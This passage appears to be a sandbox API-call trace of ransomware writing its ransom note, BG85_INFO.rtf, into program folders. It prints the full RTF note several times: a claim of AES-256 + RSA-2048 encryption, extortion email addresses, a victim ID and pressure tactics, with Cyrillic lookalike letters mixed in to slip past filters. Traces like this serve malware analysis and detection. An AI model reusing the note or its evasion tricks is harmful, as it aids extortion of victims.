s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x1e971a8, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0071.056] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e971a8*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x1e971a8*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0071.057] CloseHandle (hObject=0x1fc) returned 1 [0071.058] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DEU\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\deu\\bg85_info.rtf")) returned 0xffffffff [0071.058] GetLastError () returned 0x2 [0071.058] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DEU\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\deu\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0071.059] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0071.059] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 